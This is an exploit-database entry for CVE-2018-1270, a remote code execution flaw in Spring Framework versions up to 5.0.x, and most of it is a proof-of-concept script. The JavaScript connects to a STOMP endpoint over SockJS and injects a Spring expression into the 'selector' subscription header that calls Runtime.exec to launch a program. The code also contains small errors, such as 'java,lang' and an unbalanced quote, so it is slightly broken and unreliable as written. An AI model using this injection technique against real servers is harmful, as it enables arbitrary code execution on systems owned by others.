Pivotal Spring Java Framework < 5.0 - Remote Code Execution

2018-05-29
ID: 98102
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE: CVE-2018-1270
# Version: <= 5.0.x 

# Description: By connecting to spring STOMP, and putting the key for "selector" 
# header, we can execute code on Spring.

# POC:
# Here' we are writting java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable

var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};

var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
	setConnected(true);
	console.log('Connected: ' + frame);
	stompClient.subscribe('/topic/greetings', function(greeting){
		showGreeting(JSON.parse(greeting.body).content);
		},header);
});
1-4-2 (www02)